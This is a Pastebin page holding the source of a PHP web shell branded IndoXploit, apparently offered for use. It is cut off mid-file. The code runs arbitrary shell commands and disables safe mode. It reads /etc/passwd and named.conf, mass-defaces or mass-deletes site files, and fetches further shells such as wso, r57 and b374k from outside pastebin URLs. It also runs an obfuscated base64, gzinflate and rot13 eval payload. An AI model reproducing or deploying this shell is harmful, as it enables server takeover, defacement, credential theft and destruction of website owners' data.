--00--

PRIV8 SHELL UNDETECT & FULL FITURE | INDOXPLOIT RECODED SHEL

Aug 5th, 2016
583
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 115.94 KB | None | 0 0
  1. <?php
  2. @session_start();
  3. @error_reporting(0);
  4. @error_log(0);
  5. @ini_set('error_log',NULL);
  6. @ini_set('log_errors',0);
  7. @ini_set('max_execution_time',0);
  8. @ini_set('output_buffering',0);
  9. @ini_set('display_errors', 0);
  10. @set_time_limit(0);
  11. @set_magic_quotes_runtime(0);
  12. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  13.     if( empty( $lol ) ||
  14.         ( isset( $_POST['--00--'] ) && ( md5($_POST['--00--']) == $lol ) ) )
  15.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  16.     else
  17.         printLogin();
  18. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  19.     @ob_clean();
  20.     $file = $_GET['file'];
  21.     header('Content-Description: File Transfer');
  22.     header('Content-Type: application/octet-stream');
  23.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  24.     header('Expires: 0');
  25.     header('Cache-Control: must-revalidate');
  26.     header('Pragma: public');
  27.     header('Content-Length: ' . filesize($file));
  28.     readfile($file);
  29.     exit;
  30. }
  31.    
  32. ?>
  33. <html>
  34. <head>
  35. <title>--00--</title>
  36. <link href='http://vignette2.wikia.nocookie.net/regularshow/images/f/fc/Emoticones_-_Pacman.png/revision/latest?cb=20160107170905&path-prefix=es' rel='icon' type='image/x-icon'/>
  37. <meta name='author' content='IndoXploit'>
  38. <meta charset="UTF-8">
  39. <style type='text/css'>
  40. @import url(https://fonts.googleapis.com/css?family=Abel);
  41. @import url(http://cdn.poln.biz/css1.css?family=Abel);
  42. html {
  43.     background: #000000;
  44.     color: #ffffff;
  45.     font-family: 'Abel';
  46.     font-size: 13px;
  47.     width: 100%;
  48. }
  49. li {
  50.     display: inline;
  51.     margin: 5px;
  52.     padding: 5px;
  53. }
  54. table, th, td {
  55.     border-collapse:collapse;
  56.     font-family: Tahoma, Geneva, sans-serif;
  57.     background: transparent;
  58.     font-family: 'Abel';
  59.     font-size: 13px;
  60. }
  61. .table_home, .th_home, .td_home {
  62.     border: 1px solid #ffffff;
  63. }
  64. th {
  65.     padding: 10px;
  66. }
  67. a {
  68.     color: #ffffff;
  69.     text-decoration: none;
  70. }
  71. a:hover {
  72.     color: gold;
  73.     text-decoration: underline;
  74. }
  75. b {
  76.     color: gold;
  77. }
  78. input[type=text], input[type=password],input[type=submit] {
  79.     background: transparent;
  80.     color: #ffffff;
  81.     border: 1px solid #ffffff;
  82.     margin: 5px auto;
  83.     padding-left: 5px;
  84.     font-family: 'Abel';
  85.     font-size: 13px;
  86. }
  87. textarea {
  88.     border: 1px solid #ffffff;
  89.     width: 100%;
  90.     height: 400px;
  91.     padding-left: 5px;
  92.     margin: 10px auto;
  93.     resize: none;
  94.     background: transparent;
  95.     color: #ffffff;
  96.     font-family: 'Abel';
  97.     font-size: 13px;
  98. }
  99. select {
  100.     background: transparent;
  101.     color: #ffffff;
  102.     border: 1px solid #ffffff;
  103.     margin: 5px auto;
  104.     padding-left: 5px;
  105.     font-family: 'Abel';
  106.     font-size: 13px;
  107. }
  108. .but {
  109.     background: transparent;
  110.     color: #ffffff;
  111.     border: 1px solid #ffffff;
  112.     margin: 5px auto;
  113.     padding-left: 5px;
  114.     font-family: 'Abel';
  115.     font-size: 13px;
  116. }
  117. </style>
  118. </head>
  119. <?php
  120. if (file_exists("php.ini")){
  121. }else{
  122. $img = fopen('php.ini', 'w');
  123. $sec = "safe_mode = OFF
  124. disable_funtions = NONE";
  125. fwrite($img ,$sec);
  126. fclose($img);}     
  127. function w($dir,$perm) {
  128.     if(!is_writable($dir)) {
  129.         return "<font color=red>".$perm."</font>";
  130.     } else {
  131.         return "<font color=lime>".$perm."</font>";
  132.     }
  133. }
  134. function exe($cmd) {    
  135. if(function_exists('system')) {        
  136.         @ob_start();       
  137.         @system($cmd);     
  138.         $buff = @ob_get_contents();        
  139.         @ob_end_clean();       
  140.         return $buff;  
  141.     } elseif(function_exists('exec')) {        
  142.         @exec($cmd,$results);      
  143.         $buff = "";        
  144.         foreach($results as $result) {         
  145.             $buff .= $result;      
  146.         } return $buff;    
  147.     } elseif(function_exists('passthru')) {        
  148.         @ob_start();       
  149.         @passthru($cmd);       
  150.         $buff = @ob_get_contents();        
  151.         @ob_end_clean();       
  152.         return $buff;  
  153.     } elseif(function_exists('shell_exec')) {      
  154.         $buff = @shell_exec($cmd);     
  155.         return $buff;  
  156.     }
  157. }
  158. function perms($file){
  159. $perms = fileperms($file);
  160. if (($perms & 0xC000) == 0xC000) {
  161. $info = 's';
  162. } elseif (($perms & 0xA000) == 0xA000) {
  163. $info = 'l';
  164. } elseif (($perms & 0x8000) == 0x8000) {
  165. $info = '-';
  166. } elseif (($perms & 0x6000) == 0x6000) {
  167. $info = 'b';
  168. } elseif (($perms & 0x4000) == 0x4000) {
  169. $info = 'd';
  170. } elseif (($perms & 0x2000) == 0x2000) {
  171. $info = 'c';
  172. } elseif (($perms & 0x1000) == 0x1000) {
  173. $info = 'p';
  174. } else {
  175. $info = 'u';
  176. }
  177. $info .= (($perms & 0x0100) ? 'r' : '-');
  178. $info .= (($perms & 0x0080) ? 'w' : '-');
  179. $info .= (($perms & 0x0040) ?
  180. (($perms & 0x0800) ? 's' : 'x' ) :
  181. (($perms & 0x0800) ? 'S' : '-'));
  182. $info .= (($perms & 0x0020) ? 'r' : '-');
  183. $info .= (($perms & 0x0010) ? 'w' : '-');
  184. $info .= (($perms & 0x0008) ?
  185. (($perms & 0x0400) ? 's' : 'x' ) :
  186. (($perms & 0x0400) ? 'S' : '-'));
  187. $info .= (($perms & 0x0004) ? 'r' : '-');
  188. $info .= (($perms & 0x0002) ? 'w' : '-');
  189. $info .= (($perms & 0x0001) ?
  190. (($perms & 0x0200) ? 't' : 'x' ) :
  191. (($perms & 0x0200) ? 'T' : '-'));
  192. return $info;
  193. }
  194. function hdd($s) {
  195. if($s >= 1073741824)
  196. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  197. elseif($s >= 1048576)
  198. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  199. elseif($s >= 1024)
  200. return sprintf('%1.2f',$s / 1024 ) .' KB';
  201. else
  202. return $s .' B';
  203. }
  204. function ambilWord($param, $kata1, $kata2){
  205.     if(strpos($param, $kata1) === FALSE) return FALSE;
  206.     if(strpos($param, $kata2) === FALSE) return FALSE;
  207.     $start = strpos($param, $kata1) + strlen($kata1);
  208.     $end = strpos($param, $kata2, $start);
  209.     $return = substr($param, $start, $end - $start);
  210.     return $return;
  211. }
  212. if(get_magic_quotes_gpc()) {
  213.     function idx_ss($array) {
  214.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  215.     }
  216.     $_POST = idx_ss($_POST);
  217. }
  218. function CreateTools($names,$lokasi){
  219.     if ( $_GET['create'] == $names ){
  220.         $a= "".$_SERVER['SERVER_NAME']."";
  221. $b= dirname($_SERVER['PHP_SELF']);
  222. $c = "/00_tools/".$names.".php";
  223. if (file_exists('00_tools/'.$names.'.php')){
  224.     echo '<script type="text/javascript">alert("Done");window.location.href = "00_tools/'.$names.'.php";</script> ';
  225.     }
  226.     else {mkdir("00_tools", 0777);
  227. file_put_contents('00_tools/'.$names.'.php', file_get_contents($lokasi));
  228. echo ' <script type="text/javascript">alert("Done");window.location.href = "00_tools/'.$names.'.php";</script> ';}}}
  229.  
  230. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
  231. CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  232. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
  233. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
  234. CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
  235. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  236. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  237. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  238. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
  239. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  240. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
  241. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  242. CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL");
  243. CreateTools("bh","http://pastebin.com/raw/3L2ESWeu");
  244. CreateTools("dhanus","http://pastebin.com/raw/v4xGus6X");
  245. if(isset($_GET['dir'])) {
  246.     $dir = $_GET['dir'];
  247.     chdir($_GET['dir']);
  248. } else {
  249.     $dir = getcwd();
  250. }
  251. $dir = str_replace("\\","/",$dir);
  252. $scdir = explode("/", $dir);
  253. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  254. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  255. $ds = @ini_get("disable_functions");
  256. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  257. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  258. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  259. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  260. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  261. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  262. if(!function_exists('posix_getegid')) {
  263.     $user = @get_current_user();
  264.     $uid = @getmyuid();
  265.     $gid = @getmygid();
  266.     $group = "?";
  267. } else {
  268.     $uid = @posix_getpwuid(posix_geteuid());
  269.     $gid = @posix_getgrgid(posix_getegid());
  270.     $user = $uid['name'];
  271.     $uid = $uid['uid'];
  272.     $group = $gid['name'];
  273.     $gid = $gid['gid'];
  274. }
  275. $d0mains = @file("/etc/named.conf");
  276.             $users=@file('/etc/passwd');
  277.         if($d0mains)
  278.         {
  279.             $count;  
  280.             foreach($d0mains as $d0main)
  281.             {
  282.                 if(@ereg("zone",$d0main))
  283.                 {
  284.                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
  285.                     flush();
  286.                     if(strlen(trim($domains[1][0])) > 2)
  287.                     {
  288.                         flush();
  289.                         $count++;
  290.                     }
  291.                 }
  292.             }
  293.         }
  294.  
  295. $sport=$_SERVER['SERVER_PORT'];
  296. echo "<table style='width:100%'>";
  297. echo "<tr><td>System: <font color=lime>".php_uname()."</font></td></tr>";
  298. echo "<tr><td>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")</td></tr>";
  299. echo "<tr><td>Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
  300. echo "<tr><td>HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
  301. echo "<tr><td>Websites :<font color=lime> $count </font> Domains</td></tr>";
  302. echo "<tr><td>Port :<font color=lime>  $sport</font> </td></tr>";
  303. echo "<tr><td>Safe Mode: $sm</td></tr>";
  304. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  305. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  306. echo "<tr><td>Current DIR: ";
  307. foreach($scdir as $c_dir => $cdir) {   
  308.     echo "<a href='?dir=";
  309.     for($i = 0; $i <= $c_dir; $i++) {
  310.         echo $scdir[$i];
  311.         if($i != $c_dir) {
  312.         echo "/";
  313.         }
  314.     }
  315.     echo "'>$cdir</a>/";
  316. }
  317. echo "</td></tr></table><hr>";
  318. echo "<center>";
  319. echo "<ul>";
  320. echo "<li>[ <a href='?'>Home</a> ]</li>";
  321. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  322. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  323. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  324. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  325. echo "<li>[ <a href='?dir=$dir&do=lcf'>LiteSpeed Config</a> ]</li>";
  326. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  327. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]<br></li>";
  328. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  329. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  330. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  331. echo "<li>[ <a href='?dir=$dir&do=defacerid'>Defacer.ID</a> ]</li>";
  332. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li><br>";
  333. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  334. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  335. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  336. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  337. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  338. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  339. echo "<li>[ <a href='?dir=$dir&do=passwbypass'>Bypass etc/passw</a> ]<br></li>";
  340. echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
  341. echo "<li>[ <a href='?dir=$dir&do=shellchk'>Shell Checker</a> ]</li>";
  342. echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
  343. echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
  344. echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
  345. echo "<li>[ <a href='?dir=$dir&do=metu'>LogOut</a> ]<br></li>";
  346. echo "</ul>";
  347. echo "</center>";
  348. echo "<hr>";
  349. if($_GET['do'] == 'upload') {
  350.     echo "<center>";
  351.     if($_POST['upload']) {
  352.         if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  353.             $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  354.         } else {
  355.             $act = "<font color=red>failed to upload file</font>";
  356.         }
  357.     }
  358.     echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
  359.     echo $act;
  360.     echo "</center>";
  361. }
  362.  elseif($_GET['do'] == 'cmd') {
  363.     echo "<form method='post'>
  364.     <font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
  365.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  366.     </form>";
  367.     if($_POST['do_cmd']) {
  368.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  369.     }
  370. } elseif($_GET['do'] == 'mass_deface') {
  371.     echo "<center><form action=\"\" method=\"post\">\n";
  372.     $dirr=$_POST['d_dir'];
  373.     $index = $_POST["script"];
  374.     $index = str_replace('"',"'",$index);
  375.     $index = stripslashes($index);
  376.     function edit_file($file,$index){
  377.         if (is_writable($file)) {
  378.         clear_fill($file,$index);
  379.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  380.         }
  381.         else {
  382.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  383.             }
  384.             }
  385.     function hapus_massal($dir,$namafile) {
  386.         if(is_writable($dir)) {
  387.             $dira = scandir($dir);
  388.             foreach($dira as $dirb) {
  389.                 $dirc = "$dir/$dirb";
  390.                 $lokasi = $dirc.'/'.$namafile;
  391.                 if($dirb === '.') {
  392.                     if(file_exists("$dir/$namafile")) {
  393.                         unlink("$dir/$namafile");
  394.                     }
  395.                 } elseif($dirb === '..') {
  396.                     if(file_exists("".dirname($dir)."/$namafile")) {
  397.                         unlink("".dirname($dir)."/$namafile");
  398.                     }
  399.                 } else {
  400.                     if(is_dir($dirc)) {
  401.                         if(is_writable($dirc)) {
  402.                             if(file_exists($lokasi)) {
  403.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  404.                                 unlink($lokasi);
  405.                                 $idx = hapus_massal($dirc,$namafile);
  406.                             }
  407.                         }
  408.                     }
  409.                 }
  410.             }
  411.         }
  412.     }
  413.     function clear_fill($file,$index){
  414.         if(file_exists($file)){
  415.             $handle = fopen($file,'w');
  416.             fwrite($handle,'');
  417.             fwrite($handle,$index);
  418.             fclose($handle);  } }
  419.  
  420.     function gass(){
  421.         global $dirr , $index ;
  422.         chdir($dirr);
  423.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  424.         $files = scandir($dirr) ;
  425.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  426.         sort($files);
  427.         $n = 0 ;
  428.         foreach ($files as $file){
  429.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  430.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  431.                 edit_file($file,$index);
  432.                 flush();
  433.                 $n = $n +1 ;
  434.                 }
  435.                 }
  436.                 echo "<br>";
  437.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  438.                     }
  439.     function ListFiles($dirrall) {
  440.  
  441.     if($dh = opendir($dirrall)) {
  442.  
  443.        $files = Array();
  444.        $inner_files = Array();
  445.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  446.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  447.         while($file = readdir($dh)) {
  448.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  449.                 if(is_dir($dirrall . "/" . $file)) {
  450.                     $inner_files = ListFiles($dirrall . "/" . $file);
  451.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  452.                 } else {
  453.                     array_push($files, $dirrall . "/" . $file);
  454.                 }
  455.             }
  456.             }
  457.  
  458.             closedir($dh);
  459.             return $files;
  460.         }
  461.     }
  462.     function gass_all(){
  463.         global $index ;
  464.         $dirrall=$_POST['d_dir'];
  465.         foreach (ListFiles($dirrall) as $key=>$file){
  466.             $file = str_replace('//',"/",$file);
  467.             echo "<center><strong>$file</strong> ===>";
  468.             edit_file($file,$index);
  469.             flush();
  470.         }
  471.         $key = $key+1;
  472.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  473.     function sabun_massal($dir,$namafile,$isi_script) {
  474.         if(is_writable($dir)) {
  475.             $dira = scandir($dir);
  476.             foreach($dira as $dirb) {
  477.                 $dirc = "$dir/$dirb";
  478.                 $lokasi = $dirc.'/'.$namafile;
  479.                 if($dirb === '.') {
  480.                     file_put_contents($lokasi, $isi_script);
  481.                 } elseif($dirb === '..') {
  482.                     file_put_contents($lokasi, $isi_script);
  483.                 } else {
  484.                     if(is_dir($dirc)) {
  485.                         if(is_writable($dirc)) {
  486.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  487.                             file_put_contents($lokasi, $isi_script);
  488.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  489.                         }
  490.                     }
  491.                 }
  492.             }
  493.         }
  494.     }
  495.     if($_POST['mass'] == 'onedir') {
  496.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  497.         $ini="http://";
  498.         $mainpath=$_POST[d_dir];
  499.         $file=$_POST[d_file];
  500.         $dir=opendir("$mainpath");
  501.         $code=base64_encode($_POST[script]);
  502.         $indx=base64_decode($code);
  503.         while($row=readdir($dir)){
  504.         $start=@fopen("$row/$file","w+");
  505.         $finish=@fwrite($start,$indx);
  506.         if ($finish){
  507.             echo"$ini$row/$file\n";
  508.             }
  509.         }
  510.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  511.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  512.         $dir=opendir("$mainpath");
  513.         $code=base64_encode($_POST[script]);
  514.         $indx=base64_decode($code);
  515.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  516.         $finish=@fwrite($start,$indx);
  517.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  518.         }
  519.  
  520.     }
  521.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  522.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  523.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  524.     elseif($_POST['mass'] == 'massdeface') {
  525.         echo "<div style='margin: 5px auto; padding: 5px'>";
  526.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  527.         echo "</div>";  }
  528.     else {
  529.         echo "
  530.         <center><font style='text-decoration: underline;'>
  531.         Select Type:<br>
  532.         </font>
  533.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  534.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  535.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  536.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  537.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  538.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  539.         <font style='text-decoration: underline;'>Folder:</font><br>
  540.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  541.         <font style='text-decoration: underline;'>Filename:</font><br>
  542.         <input type='text' name='d_file' value='0x.php' style='width: 450px;' height='10'><br>
  543.         <font style='text-decoration: underline;'>Index File:</font><br>
  544.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By --00--</textarea><br>
  545.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  546.         </form></center>";
  547.         }
  548.     }
  549. elseif($_GET['do'] == 'zip') {
  550.     echo "<center><h1>Zip Menu</h1>";
  551. function rmdir_recursive($dir) {
  552.     foreach(scandir($dir) as $file) {
  553.        if ('.' === $file || '..' === $file) continue;
  554.        if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  555.        else unlink("$dir/$file");
  556.    }
  557.    rmdir($dir);
  558. }
  559. if($_FILES["zip_file"]["name"]) {
  560.     $filename = $_FILES["zip_file"]["name"];
  561.     $source = $_FILES["zip_file"]["tmp_name"];
  562.     $type = $_FILES["zip_file"]["type"];
  563.     $name = explode(".", $filename);
  564.     $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  565.     foreach($accepted_types as $mime_type) {
  566.         if($mime_type == $type) {
  567.             $okay = true;
  568.             break;
  569.         }
  570.     }
  571.     $continue = strtolower($name[1]) == 'zip' ? true : false;
  572.     if(!$continue) {
  573.         $message = "Itu Bukan Zip  , , GOBLOK COK";
  574.     }
  575.   $path = dirname(__FILE__).'/';
  576.   $filenoext = basename ($filename, '.zip');
  577.   $filenoext = basename ($filenoext, '.ZIP');
  578.   $targetdir = $path . $filenoext;
  579.   $targetzip = $path . $filename;
  580.   if (is_dir($targetdir))  rmdir_recursive ( $targetdir);
  581.   mkdir($targetdir, 0777);
  582.     if(move_uploaded_file($source, $targetzip)) {
  583.         $zip = new ZipArchive();
  584.         $x = $zip->open($targetzip);
  585.         if ($x === true) {
  586.             $zip->extractTo($targetdir);
  587.             $zip->close();
  588.  
  589.             unlink($targetzip);
  590.         }
  591.         $message = "<b>Sukses Gan :)</b>";
  592.     } else {   
  593.         $message = "<b>Error Gan :(</b>";
  594.     }
  595. }  
  596. echo '<table style="width:100%" border="1">
  597.  <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  598. <label>Zip File : <input type="file" name="zip_file" /></label>
  599. <input type="submit" name="submit" value="Upload And Unzip" />
  600. </form>';
  601. if($message) echo "<p>$message</p>";
  602. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";  
  603.     if($_POST['backup']){
  604.     $save=$_POST['save'];
  605.     function Zip($source, $destination)
  606. {
  607.     if (extension_loaded('zip') === true)
  608.     {
  609.         if (file_exists($source) === true)
  610.         {
  611.             $zip = new ZipArchive();
  612.  
  613.             if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  614.             {
  615.                 $source = realpath($source);
  616.  
  617.                 if (is_dir($source) === true)
  618.                 {
  619.                     $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  620.  
  621.                     foreach ($files as $file)
  622.                     {
  623.                         $file = realpath($file);
  624.  
  625.                         if (is_dir($file) === true)
  626.                         {
  627.                             $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  628.                         }
  629.  
  630.                         else if (is_file($file) === true)
  631.                         {
  632.                             $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  633.                         }
  634.                     }
  635.                 }
  636.  
  637.                 else if (is_file($source) === true)
  638.                 {
  639.                     $zip->addFromString(basename($source), file_get_contents($source));
  640.                 }
  641.             }
  642.  
  643.             return $zip->close();
  644.         }
  645.     }
  646.  
  647.     return false;
  648. }
  649.     Zip($_POST['dir'],$save);
  650.     echo "Done , Save To <b>$save</b>";
  651.     }
  652.     echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
  653.     if($_POST['extrak']){
  654.     $save=$_POST['save'];
  655.     $zip = new ZipArchive;
  656.     $res = $zip->open($_POST['dir']);
  657.     if ($res === TRUE) {
  658.         $zip->extractTo($save);
  659.         $zip->close();
  660.     echo 'Succes , Location : <b>'.$save.'</b>';
  661.     } else {
  662.     echo 'Gagal Mas :( Ntahlah !';
  663.     }
  664.     }
  665. echo '</tr></table>';  
  666.     }
  667.     elseif($_GET['do'] == 'shellchk') {
  668.         eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
  669.     } elseif($_GET['do'] == 'loghunter')
